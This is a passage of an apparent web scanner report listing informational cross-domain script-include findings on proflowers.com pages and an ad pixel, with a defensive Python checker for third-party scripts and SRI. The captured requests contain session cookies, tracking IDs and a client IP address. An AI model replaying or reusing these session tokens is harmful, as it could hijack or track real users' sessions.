Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:52 GMT
Content-Length: 46799


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
</div>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>
                               
                               <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td class="OPLeftColumn" valign="top" style="width:577px;">
                               
                               
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/giftoptionspage.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<div id="FaqOuterContainer" ><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

17.7. https://orders.proflowers.com/orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

Issue detail

The response dynamically includes scripts from the following other domain (the one visible in the captured response below): a248.e.akamai.net

Request

GET /orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx?aspxerrorpath=/OrderProcess/GiftOptions.aspx HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPC&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:10:21 GMT
Content-Length: 22986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <head id="Head1"><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcde
...[SNIP]...
<META HTTP-EQUIV="Refresh" CONTENT="1740;URL=http://www.proflowers.com/">
       <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td>
       

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

17.8. https://orders.proflowers.com/orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

Issue detail

The response dynamically includes scripts from the following other domain (the one visible in the captured response below): a248.e.akamai.net

Request

GET /orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx?aspxerrorpath=/OrderProcess/GiftOptions.aspx HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f24%2f2011&pid=30003767&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=168084
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:13:17 GMT
Content-Length: 22986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <head id="Head1"><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcde
...[SNIP]...
<META HTTP-EQUIV="Refresh" CONTENT="1740;URL=http://www.proflowers.com/">
       <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td>
       

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

17.9. http://pixel.fetchback.com/serve/fb/pdc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The response dynamically includes scripts from the following other domains (those visible in the captured response below, all fetched over plain http): www.googleadservices.com, segment-pixel.invitemedia.com, ad.adtegrity.net

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3006&browse_products=91637&fb_key=undefined%20Fields%20of%20Europe%20for%20Spring HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304902899_11051:0_13981:207837_13479:207837_15758:367170_12704:367170_4895:795355_10164:1159631_10638:1159631_10640:1159631_10641:1159631_1437:1159631_1660:1723227; uid=1_1304902899_1303179323923:6792170478871670; kwd=1_1304902899_12936:207837_11317:1159631_11717:1159631_11718:1159631_11719:1159631; sit=1_1304902899_3006:34:0_3455:207837:207837_2988:430117:395946_3801:542560:542140_1714:827093:795355_3306:1054719:367170_719:1160458:1159631_2451:1211327:1206227_3236:1369290:1369172_782:1723576:1723227; cre=1_1304902899_29802:59536:1:541928_29805:59534:1:542589; bpd=1_1304902899_1ZCU5:4QNG; apd=1_1304902899; scg=1_1304902899; ppd=1_1304902899; afl=1_1304902899

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:08:51 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1304903331_13521:0_11051:0_11051:432_13981:208269_13479:208269_15758:367602_12704:367602_4895:795787_10164:1160063_10638:1160063_10640:1160063_10641:1160063_1437:1160063_1660:1723659; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: uid=1_1304903331_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: kwd=1_1304903331_12936:208269_11317:1160063_11717:1160063_11718:1160063_11719:1160063; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: sit=1_1304903331_3006:466:0_3455:208269:208269_2988:430549:396378_3801:542992:542572_1714:827525:795787_3306:1055151:367602_719:1160890:1160063_2451:1211759:1206659_3236:1369722:1369604_782:1724008:1723659; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: cre=1_1304903331_29802:59536:1:542360_29805:59534:1:543021; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: bpd=1_1304903331_1ZunS:0_1ZCU5:4QUE; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: apd=1_1304903331; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: scg=1_1304903331; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: ppd=1_1304903331; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: afl=1_1304903331; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 01:08:51 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2321

<!-- campaign #11051 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(tim
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<!-- "1800Flowers" c/o "FetchBack", segment: '1800Flowers Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=39804&partnerID=91&clientID=4744&key=segment&returnType=js"></script>
...[SNIP]...
<img src="http://at.amgdgt.com/ads/?t=pp&px=15038&rnd=$timestamp" width="1" height="1" border="0"/>
<script src="http://ad.adtegrity.net/pixel?id=972818&t=1" type="text/javascript"></script>
...[SNIP]...
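Findings 17.5 through 17.10 all report the same condition: the page loads JavaScript from a host other than its own, and that script runs with the including page's origin, so a compromise of (or a malicious change at) the third-party host is equivalent to a compromise of the checkout page. The checker below is an added example, not code from the XSS.CX report or from any of the sites it names. It reproduces the host comparison on a captured response and adds two checks the report does not make: whether the include is fetched over plain http (tamperable in transit) and whether it carries a Subresource Integrity `integrity` attribute; it also computes the SRI value for a script body you have vetted. The first two script tags in the constructed sample copy includes visible in the 17.5 response above; the hosts `ads.example.invalid` and `cdn.example.invalid`, the local path and the placeholder hash are assumptions made for the example.

```python
"""Cross-domain script include checker (added example, not from the report)."""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _ScriptSrcCollector(HTMLParser):
    """Collect (src, integrity) for every <script> start tag that has a src attribute."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        attr = dict(attrs)
        if attr.get("src"):
            self.scripts.append((attr["src"], attr.get("integrity")))


def cross_domain_scripts(page_url, html):
    """Return one dict per <script src> whose host differs from the page's host.

    Each dict records the src, the foreign host, whether the script is fetched
    over plain http and whether an SRI integrity attribute is present. Relative
    src values are same-origin and are skipped; a protocol-relative "//host/x"
    inherits the page scheme.
    """
    page_parts = urlsplit(page_url)
    page_host = (page_parts.hostname or "").lower()
    collector = _ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src, integrity in collector.scripts:
        parts = urlsplit(src.strip())
        host = parts.hostname
        if host is None:                 # relative src: same origin, not a finding
            continue
        if host.lower() == page_host:
            continue
        scheme = parts.scheme or page_parts.scheme
        findings.append({
            "src": src,
            "host": host,
            "plain_http": scheme.lower() == "http",
            "has_sri": integrity is not None,
        })
    return findings


def sri_integrity(script_bytes, algo="sha384"):
    """Integrity attribute value for a vetted script body, e.g. 'sha384-<base64 digest>'."""
    digest = hashlib.new(algo, script_bytes).digest()
    return algo + "-" + base64.b64encode(digest).decode("ascii")


# Constructed sample: the first two tags mirror script includes visible in the
# 17.5 response; the remaining three are hypothetical and exercise the
# relative, plain-http and SRI cases.
SAMPLE_PAGE_URL = "https://orders.proflowers.com/OrderProcess/IdentifyCustomer.aspx"
SAMPLE_HTML = """<html><head>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
<script src="/client/javascript/local.js"></script>
<script src="http://ads.example.invalid/pixel.js"></script>
<script src="https://cdn.example.invalid/vetted.js" integrity="sha384-placeholder"></script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for f in cross_domain_scripts(SAMPLE_PAGE_URL, SAMPLE_HTML):
        flags = []
        if f["plain_http"]:
            flags.append("plain http")
        if not f["has_sri"]:
            flags.append("no SRI")
        print(f"{f['host']:<24} {', '.join(flags) or 'ok':<20} {f['src']}")
    print("integrity for an empty script:", sri_integrity(b""))
```

Run it against a saved response body to get the same list the report's "Issue detail" gives, plus the two extra columns. SRI only helps for static scripts whose bytes you control the review of; for tracking and personalisation scripts that change on the vendor's schedule (the Omniture, OpinionLab, Mercent and ad-network includes in these findings), the realistic controls are a Content-Security-Policy `script-src` allow-list and keeping such includes off pages that handle payment or account data.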

17.10. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The response dynamically includes scripts from the following other domain (the one visible in the captured response below, fetched over plain http): a1128.g.akamai.net

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:50 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:08:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:51 GMT
Content-Length: 144498


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
<div>
   
           
                           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/productdetails.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<input type="hidden" name="productDetailBody$_hdQS" id="productDetailBody__hdQS" />
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsetselectionsimple.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
